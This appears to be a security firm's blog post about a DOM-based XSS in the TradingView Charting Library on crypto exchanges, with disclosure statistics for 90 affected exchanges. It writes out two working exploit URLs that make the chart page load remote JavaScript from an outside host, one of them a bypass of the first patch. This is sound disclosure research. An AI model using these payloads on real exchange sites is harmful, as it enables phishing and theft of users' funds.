Hacken Ecosystem

# Intro

Crypto exchanges are the banks of the future, accumulating and operating with large amounts of clients’ funds and, due to the KYC process, are responsible for handling a considerable amount of sensitive data. Therefore, security is a serious issue that should be addressed in advance. We’ve decided to make a research regarding vulnerability disclosure and vulnerability handling process inside these organizations to check how they addressed external reports from researchers. Based on our internal security experience of pentesting exchanges and participating in bug bounties, during last year one vulnerability was pretty common for crypto exchanges. We took this vulnerability as a reason to chat with them. Check the results below.

TradingView Charting Library is very popular across cryptocurrency exchange platforms. Most crypto exchanges use this library as a function in their services to display online trading charts. On September 24, 2018, data on high-risk DOM Based XSS library vulnerabilities was introduced. All exchanges using this library were vulnerable.

The XSS vulnerability can be used to bypass built-in security measures, conduct advanced phishing attacks, or even to perform unauthorized transactions.

# Technical background

Any web app, using the TradingView Charting Library in its services, stores a publicly accessible HTML file called `tv-chart.html` on the server. This file is used to initialize trading charts through location.hash parameters. As a result of the charts initialization, the iframe link to the page of the following type is loaded onto the page.

[pastacode lang=”javascript” manual=”https%3A%2F%2Fexample.com%2Ftradingview%2Fen-tv-chart.x.html%23symbol%3DBTC_ETH%26interval%3D180%26widgetbar%3D%257B%2522details%2522%253Afalse%252C%2522watchlist%2522%253Afalse%252C%2522watchlist_settings%2522%253A%257B%2522default_symbols%2522%253A%255B%255D%257D%257D%26drawingsAccess%3D%257B%2522type%2522%253A%2522black%2522%257D%26locale%3Den%26uid%3Dtradingview_36472%26clientId%3Dtradingview.com%26userId%3Dpublic_user%26chartsStorageVer%3D1.0%26debug%3Dfalse%26timezone%3DAsia%252FTaipei%26theme%3DDark” message=”” highlight=”” provider=”manual”/]

# Details

The vulnerability was located in the third-party trading charts loading function. The function used a link obtained from the user input of the `indicatorsFile` parameter, and transferred it to `$.getScript()`.

A vulnerable link, executing arbitrary JavaScript code, looks like follows.

[pastacode lang=”javascript” manual=”https%3A%2F%2Fexample.com%2Ftradingview%2Fen-tv-chart.x.html%23disabledFeatures%3D%5B%5D%26enabledFeatures%3D%5B%5D%26indicatorsFile%3D%2F%2Fxss.rocks%2Fxss.js” message=”” highlight=”” provider=”manual”/]

When users clicked that link, the following code was executed: xss.rocks/xss.js.

After the vulnerability had been publicly disclosed, TradingView released a new library version to fix it. The function, responsible for loading third-party charts, was changed. The new version of this function looked as follows.This fix was incorrect and the vulnerability can still be reproduced using the `customIndicatorsUrl` parameter while adding the `uid=urlParams` parameter.

[pastacode lang=”javascript” manual=”https%3A%2F%2Fexample.com%2Ftradingview%2Fen-tv-chart.x.html%23disabledFeatures%3D%5B%5D%26enabledFeatures%3D%5B%5D%26customIndicatorsUrl%3D%2F%2Fxss.rocks%2Fxss.js%26uid%3DurlParams” message=”” highlight=”” provider=”manual”/]

As of this moment, a new library version has been released. It completely fixes the vulnerability.

# Analysis

All exchange platforms, included in the CoinMarketCap list, were tested for vulnerable library version. As a result, 90 vulnerable exchange services were identified, including those with top trading volumes.

# Disclosure

All vulnerable exchanges were notified of the vulnerability.

  • 46 exchanges ignored that alert
  • 44 exchanges responded to the alert and requested technical details
  • 19 exchanges fixed the vulnerability
  • 7 exchanges suggested the reward

# Conclusion

Poor security communication and no responsible disclosure have led to an unpatched vulnerability in dozens of crypto exchanges leaving users’ money accounts under threat. If you use the TradingView Charting Library in your services, you have to check its version and update it in case the vulnerability is revealed.